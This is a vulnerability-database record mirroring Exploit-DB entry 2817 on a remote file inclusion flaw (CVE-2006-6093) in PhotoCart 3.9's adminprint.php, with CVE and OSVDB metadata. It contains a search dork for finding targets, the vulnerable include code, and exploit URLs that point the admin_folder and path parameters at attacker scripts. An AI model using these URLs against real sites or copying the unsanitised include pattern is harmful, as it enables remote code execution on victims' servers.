Search...

Photo Cart 3.9 adminprint.php Remote File Include Vulnerability

2006-11-21T00:00:00

ID EDB-ID:2817
Type exploitdb
Reporter irvian
Modified 2006-11-21T00:00:00

Description

Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability. CVE-2006-6093. Webapps exploit for php platform

                                        
                                            #####################################################################################################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Script site: http://www.picturespro.com/store/programs/129-photo_cart.html
# Dork       : inurl :/PhotoCart/
#
#####################################################################################################
##
##
## Bug Found By : irvian
##
##
####################################################################################################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#####################################################################################################

bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
    adminsessionCheck();


Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
      http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]

# milw0rm.com [2006-11-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:2817", "hash": "345b613c71bf460f4a24eaa75d72af99", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Photo Cart 3.9 adminprint.php Remote File Include Vulnerability", "description": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability. CVE-2006-6093. Webapps exploit for php platform", "published": "2006-11-21T00:00:00", "modified": "2006-11-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2817/", "reporter": "irvian", "references": [], "cvelist": ["CVE-2006-6093"], "lastseen": "2016-01-31T17:06:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T17:06:04"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6093"]}, {"type": "osvdb", "idList": ["OSVDB:30650"]}], "modified": "2016-01-31T17:06:04"}, "vulnersScore": 7.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2817/", "sourceData": "#####################################################################################################\n#\n# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability\n# Script site: http://www.picturespro.com/store/programs/129-photo_cart.html\n# Dork : inurl :/PhotoCart/\n#\n#####################################################################################################\n##\n##\n## Bug Found By : irvian\n##\n##\n####################################################################################################\n###\n### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid\n### Special greetz: #patihack #hitamputih #nyubicrew\n###\n#####################################################################################################\n\nbug found on /PhotoCart/adminprint.php\n\ninclude \"setup.php\";\n$path = \"$path\";\n$path = \"$path\";\ninclude \"$admin_folder/_admin_functions.php\";\ninclude \"$path/_db.php\";\n adminsessionCheck();\n\n\nExpl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]\n http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]\n\n# milw0rm.com [2006-11-21]\n", "osvdbidlist": ["30650"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:35", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in adminprint.php in PicturesPro Photo Cart 3.9 allow remote attackers to execute arbitrary PHP code via a URL in the (1) admin_folder and (2) path parameters.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-6093", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6093", "published": "2006-11-24T18:07:00", "title": "CVE-2006-6093", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/PhotoCart/adminprint.php?admin_folder=[evil_scripts]\nhttp://[target]/PhotoCart/adminprint.php?path=[evil_scripts]\n## References:\nVendor URL: http://www.picturespro.com/store/programs/129-photo_cart.html\n[Secunia Advisory ID:23037](https://secuniaresearch.flexerasoftware.com/advisories/23037/)\nISS X-Force ID: 30447\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2817\nFrSIRT Advisory: ADV-2006-4659\n[CVE-2006-6093](https://vulners.com/cve/CVE-2006-6093)\nBugtraq ID: 21163\n", "modified": "2006-11-21T07:03:51", "published": "2006-11-21T07:03:51", "href": "https://vulners.com/osvdb/OSVDB:30650", "id": "OSVDB:30650", "title": "Photo Cart adminprint.php Multiple Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}